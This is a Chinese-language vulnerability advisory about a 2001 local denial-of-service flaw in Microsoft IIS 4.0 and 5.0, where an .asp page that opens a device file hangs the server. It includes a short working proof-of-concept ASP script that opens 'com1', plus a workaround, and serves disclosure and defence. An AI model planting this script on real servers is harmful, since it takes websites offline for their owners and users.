发布日期：2001-07-04
更新日期：2001-07-12

受影响系统：

Microsoft IIS 5.0
   - Microsoft Windows 2000
Microsoft IIS 4.0
   - Microsoft Windows NT 4.0

描述：

---

BUGTRAQ  ID: 2973
CVE(CAN) ID: CAN-2001-1243

Microsoft IIS可能会由本地用户引发拒绝服务攻击，前提是本地用户可以创建一个
.asp文件，而这个.asp文件调用了设备文件。

这会导致Microsoft IIS停止响应，只有重新启动才能恢复正常工作。

如果站点自己的asp程序允许用户指定打开的文件，也可能导致拒绝服务发生。

<*来源：VIPER_SV /nerf/team/ （hax@r.dot）
  参考：http://www.nerf.ru
*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

VIPER_SV /nerf/team/ （hax@r.dot）提供了如下测试代码：

<%
  Dim strFileName, objFSO, objFile
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
  strFileName = "com1"
  Set objFile = objFSO.OpenTextFile(strFileName)
  Response.Write objFile.ReadAll
  objFile.Close
%>



建议：

---

临时解决方法：

VIPER_SV /nerf/team/ （hax@r.dot）提供了如下临时解决方法：

修复Scripting.FileSystemObject，在打开文件之前先检查是否存在

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.microsoft.com/



浏览次数：4036
严重程度：0（网友投票）